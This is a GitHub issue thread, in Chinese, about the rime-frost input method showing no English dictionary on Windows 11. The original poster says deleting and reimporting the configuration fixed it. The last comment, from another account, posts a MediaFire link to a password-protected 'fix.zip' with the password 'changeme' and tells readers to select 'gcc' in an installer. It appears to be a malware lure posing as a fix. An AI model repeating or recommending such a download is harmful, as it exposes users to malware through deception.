### ISSUE TITLE
在win 11上安装了白霜，没有英文词库

### ISSUE THREAD

**Issue by zhjh0521** [gaboolic/rime-frost#32]
默认安装了rime，然后把白霜配置导入到%appdata%\rime路径下，发现中文输入都是正常，词库也正常。但完全没有英文单词，英文词库一个也没有使能，我看了各种配置，也没发现哪里有问题，不知道这是什么原因

**Comment by zhjh0521** [comment]
重新把配置删了，好了

**Comment by projetosgppag** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
